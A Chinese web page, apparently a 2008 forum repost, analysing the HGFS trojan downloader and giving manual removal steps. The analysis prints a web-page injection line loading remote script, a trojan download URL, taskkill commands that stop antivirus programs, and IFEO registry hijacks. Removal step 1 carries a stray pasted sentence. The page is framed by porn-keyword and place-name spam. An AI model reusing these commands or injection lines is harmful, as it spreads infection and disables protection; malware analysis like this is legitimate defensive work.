亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费

登錄論壇 | 注冊會員 設(shè)為首頁 | 收藏本站
當前位置 : 首頁>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文
 
HGFS木馬下載器的手動查殺

http://www.yibo1263.com 2008-5-7 8:37:05  來源:BBS  編輯:葉子
 

這是一個具有感染腳本功能和局域網(wǎng)傳播功能的木馬下載器

樣本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX,保證系統(tǒng)內(nèi)只有一個實例在運行

2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動文件夾中達到開機啟動自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動\login.exe

3.執(zhí)行connnet.bat批處理內(nèi)的內(nèi)容

a.遍歷d~z盤 復(fù)制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下

b.判斷中毒機器是否處于局域網(wǎng),如果是則利用ipc漏洞建立一個空連接,并把autorun.exe和%autorun.inf復(fù)制到機器的C$下面。

4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動.exe

5.試圖結(jié)束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍歷所有磁盤刪除.gho文件

7.遍歷所有磁盤感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼

8.鏈接網(wǎng)絡(luò)下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經(jīng)失效

解決方法:

到down.45it.com下載sreng和Xdelbox

1.復(fù)制如下文字 到剪貼板(假設(shè)系統(tǒng)在C盤)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動文件夾中達到開機啟動自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動\login.exe


打開Xdelbox.exe
在下面的大框中 單擊右鍵 點擊 “剪貼板導(dǎo)入不檢查路徑”
之后剛才復(fù)制的那個文件列表將出現(xiàn)在下面的大框中
然后再在下面的大框中單擊右鍵 點擊 “立即重啟執(zhí)行刪除”
軟件會自動重啟計算機

重啟計算機以后 會有兩個系統(tǒng)進入的選擇的倒計時界面
第一個是你原來的windows系統(tǒng)
第二個是這個軟件給你設(shè)定的dos系統(tǒng)
不用你管,它會自動選擇進入第二個系統(tǒng)
類似dos的界面滾動完畢以后 病毒就被刪除了
之后他會自動重啟進入正常模式

2.打開sreng 啟動項目 注冊表
刪除所有紅色的IFEO項目

3.建議屏蔽http://17vp.cn網(wǎng)站

 
收藏】【打印】【進入論壇
  相關(guān)文章:

 
 
 
 
最新文章

中關(guān)村艷照門女主角詳記錄高清組圖 
大連護士門大尺度艷照高清組圖
iPhone女孩微博爆紅 最寶貴東西換iPhon
反恐精英之父內(nèi)維爾:改變電腦游戲銷售
團購網(wǎng)站黎明之前:中國市場慘烈廝殺不
團購鼻祖Groupon中國揭秘:快與慢的商業(yè)
Spil Games發(fā)布新的品牌形象
1800配置一臺主機 不要顯示器
聯(lián)想V360筆記本模特寫真
愛國者第四代移動硬盤將面市、低電壓保

 
推薦文章
1
2
3
4
5
6
7
8
9
10
iPhone女孩微博爆紅 最寶貴東西換
大連護士門大尺度艷照高清組圖
中關(guān)村艷照門女主角詳記錄高清組
蘋果員工中毒門
宮如敏不雅照瘋傳 看張馨予韓一菲
深耕市場 永續(xù)經(jīng)營——專訪百腦匯
優(yōu)派專業(yè)電子書 讓您回家旅途多姿
揭曉百萬大獎三星bada魅力綻放中
大明龍權(quán)“江湖英雄會”全國PK大
永恒之塔校園達人挑戰(zhàn)賽完美落幕
八卦圖解 More>>
iPhone女孩微博爆紅 最寶貴東西換 大連護士門大尺度艷照高清組圖
中關(guān)村艷照門女主角詳記錄高清組 宮如敏不雅照瘋傳 看張馨予韓一菲
云安县| 拜城县| 苏州市| 甘洛县| 中宁县| 汝城县| 仲巴县| 白水县| 河源市| 临澧县| 建阳市| 双柏县| 彰武县| 秦皇岛市| 平阳县| 沙坪坝区| 玉田县| 涞源县| 饶平县| 响水县| 施甸县| 应城市| 鄄城县| 丹凤县| 卫辉市| 永嘉县| 无棣县| 衡阳县| 吉木萨尔县| 嘉义市| 江华| 招远市| 南康市| 万载县| 鄂托克前旗| 玉树县| 巴林右旗| 太谷县| 福州市| 临安市| 思茅市|